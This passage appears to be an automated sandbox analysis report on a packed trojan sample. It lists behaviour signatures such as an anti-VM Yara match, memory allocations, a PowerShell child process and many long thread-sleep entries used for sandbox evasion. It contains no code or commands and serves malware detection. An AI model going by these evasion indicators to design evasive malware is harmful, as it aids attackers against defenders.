Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7412, type: MEMORYSTR

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Memory allocated: B00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Memory allocated: 2470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Memory allocated: 4470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Memory allocated: 9530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Memory allocated: A530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Memory allocated: A780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Memory allocated: B780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Memory allocated: 1680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Memory allocated: 31F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Memory allocated: 2F50000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 599842	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 599706	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 599452	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 599235	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 596909	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 596782	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 596657	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 596532	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 596407	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 596282	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 596157	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 595438	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 595001	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 594876	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 594751	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 594626	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 594501	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 594376	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 594251	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 594126	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 594001	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 593876	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 593751	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5658	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4119	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Window / User API: threadDelayed 2414	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Window / User API: threadDelayed 7372	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7432	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7804	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7900	Thread sleep count: 2414 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -599842s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7900	Thread sleep count: 7372 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -599706s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -599563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -599452s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -599235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -599110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -598985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -598860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -598735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -597047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -596909s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -596782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -596657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -596532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -596407s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -596282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -596157s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -595938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -595813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -595688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -595563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -595438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -595328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -595218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -595001s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -594876s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -594751s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -594626s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -594501s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -594376s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -594251s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -594126s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -594001s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -593876s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe TID: 7892	Thread sleep time: -593751s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 599842	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 599706	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 599452	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 599235	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 597047	Jump to behavior
